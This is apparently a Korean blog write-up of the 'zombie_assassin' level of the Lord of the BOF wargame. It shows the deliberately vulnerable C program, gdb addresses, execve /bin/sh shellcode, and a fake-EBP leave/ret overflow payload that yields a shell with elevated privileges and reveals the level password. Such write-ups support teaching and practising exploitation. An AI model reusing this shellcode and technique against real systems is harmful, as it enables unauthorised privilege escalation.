-
[lob] assassin -> zombie_assassin공부/LOB 2014. 7. 30. 20:07
[assassin@localhost assassin]$ cat zombie_assassin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- zombie_assassin
- FEBP
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(argv[1][47] == '\x40')
{
printf("library retbayed you, too!!\n");
exit(0);
}
// strncpy instead of strcpy!
strncpy(buffer, argv[1], 48);
printf("%s\n", buffer);
}
0x80484df <main+159>: leave
0x80484e0 <main+160>: ret
0xbffffc52: 0x90909090
(gdb)
0xbffffb08
25byte
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
payload = [sc] + 쉘코드 23 바이트 + nop 13bytes + [sc-8] + leaveret
./aaaaaaaaaaaaaaa `python -c'print "a"*40+"\xa0\xfa\xff\xbf"+"\xdf\x84\x04\x08"'`
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
`python -c 'print "bbbb"+"\x9f\xfa\xff\xbf"+"\x90"*7 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" +"\x90\xfa\xff\xbf"+"\xdf\x84\x04\x08"'`
[assassin@localhost assassin]$ ./zombie_assassin `python -c 'print "bbbb"+"\x9f\xfa\xff\xbf"+"\x90"*7 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" +"\x90\xfa\xff\xbf"+"\xdf\x84\x04\x08"'`
bbbb??퓧??????1픐h//shh/bin??S??째
???욀?
bash$ id
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$'공부 > LOB' 카테고리의 다른 글
[lob] succubus -> nightmare (0) 2015.02.19 [lob] zombie_assassin -> succubus (0) 2015.02.17 [lob] assassin -> zombie_assassin (0) 2014.07.30 [lob] giant -> assassin (0) 2014.07.30 [lob] bugbear -> giant (0) 2014.07.30 [lob] darkknight -> bugbrear (0) 2014.07.30